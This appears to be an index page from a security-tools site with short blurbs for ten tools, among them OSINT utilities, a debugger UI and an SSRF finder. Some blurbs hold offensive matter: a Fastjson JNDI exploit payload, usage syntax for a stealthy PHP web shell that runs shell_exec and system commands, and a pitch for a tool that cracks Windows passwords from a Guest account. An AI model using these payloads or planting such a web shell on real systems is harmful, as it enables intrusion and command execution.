Katoolin3 : Get Your Favourite Kali Linux Tools On Debian/Ubuntu/Linux Mint
Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu. This program is a port of katoolin from LionSec to python3. Katoolin3 offers several improvements over katoolin: Up to date packagesThe old katoolin uses an outdated package list. Katoolin3 always keeps its package list up to date.(Last updated: 18 Feb 2020)Improved handling of missing packagesThe old katoolin breaks if a package isn't available...
NTLMRecon : Enumerate Information From NTLM Authentication Enabled Web Endpoints
%20(1).png "NTLMRecon : Enumerate Information From NTLM Authentication Enabled Web Endpoints")
NTLMRecon is a fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains. NTLMRecon is built with flexibilty in mind. Need to run recon on a single URL, an IP address, an entire CIDR range or combination of all of it...
JNDI-Injection-Exploit : A Tool Which Generates JNDI Links Can Start Several Servers
.png "JNDI-Injection-Exploit : A Tool Which Generates JNDI Links Can Start Several Servers")
JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server, LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server. Using this tool allows you get JNDI links, you can insert these links into your POC to test vulnerability. For example, this is a Fastjson vul-poc: {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true} We...
OpenSquat : Detection Of Phishing Domains And Domain Squatting.
.png "OpenSquat : Detection Of Phishing Domains And Domain Squatting.")
OpenSquat is an opensource Intelligence (OSINT) security tool to identify cyber squatting threats to specific companies or domains, such as: Phishing campaignsDomain squattingTypo squattingBit squattingIDN homograph attacksDoppen ganger domainsOther brand/domain related scams It does support some key features such as: Automatic newly registered domain updating (once a day)Levenshtein distance to calculate word similarityFetches active and known phishing domains (Phishing Database project)IDN homograph attack detectionIntegration...
Win-Brute-Logon : Crack Any Microsoft Windows Users Password Without Any Privilege
Win-Brute-Logon PoC is more what I would call a serious weakness in Microsoft Windows Authentication mechanism than a vulnerability. The biggest issue is related to the lack of privilege required to perform such actions. Indeed, from a Guest account (The most limited account on Microsoft Windows), you can crack the password of any available local users. Find out which users exists using...
Scylla : The Simplistic Information Gathering Engine
.png "Scylla : The Simplistic Information Gathering Engine")
Scylla is an OSINT tool developed in Python 3.6. Scylla lets users perform advanced searches on Instagram & Twitter accounts, websites/webservers, phone numbers, and names. Scylla also allows users to find all social media profiles (main platforms) assigned to a certain username. In continuation, Scylla has shodan support so you can search for devices all over the internet, it...
Jatayu : Stealthy Stand Alone PHP Web Shell
.png "Jatayu : Stealthy Stand Alone PHP Web Shell")
JATAYU a Stealthy Stand Alone PHP Web Shell . FEATURES Http Header Based Authentication.100% Undetectable.Exec Function Changer.Nothing Fancy USAGE GET /test/jatayu.php?fn=1&&cmd=whoamiHost : http://test.comAuthtoken : bb3b1a1f-0447-42a6-955a-88681fb88499 FUNCTIONS PARAMETERFUNCTIONfn=1Calls function shell_exec()fn=2Calls function system()cmd=idExecutes command GENERATE AUTHTOKEN php$r = unpack('v*', fread(fopen('/dev/random', 'r'),16));$apiKey = sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x',$r, $r, $r, $r & 0x0fff | 0x4000,$r & 0x3fff | 0x8000, $r, $r, $r);echo $apiKey;?> Download
Chain-Reactor : An Open Source Framework For Composing Executables
.png "Chain-Reactor : An Open Source Framework For Composing Executables"){kind=logo}
Chain Reactor is an open-source tool for testing detection and response coverage on Linux machines. The tool generates executables that simulate sequences of actions like process creation and network connection. Chain Reactor assumes no prior engineering experience; the tool consumes JSON, so customizing its behavior is as simple as editing a file. Install musl Chain Reactor requires musl, which is an...
Voltron : A Hacky Debugger UI For Hackers
.png "Voltron : A Hacky Debugger UI For Hackers")
Voltron is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host. By running these views in other TTYs, you can build a customized debugger user interface to suit...
SSR Fire : An Automated SSRF Finder. Just Give The Domain Name And Your Server
SSR Fire is an automated SSRF finder. Just give the domain name and your server and chill! ;) It also has options to find XSS and open redirects. Syntax ./ssrfire.sh -d domain.com -s yourserver.com -f custom_file.txt -c cookies domain.com ---> The domain for which you want to test yourserver.com ---> Your server which detects SSRF. Eg. Burp collaborator custom_file.txt ---> Optional argument. You give your own custom URLs instead...
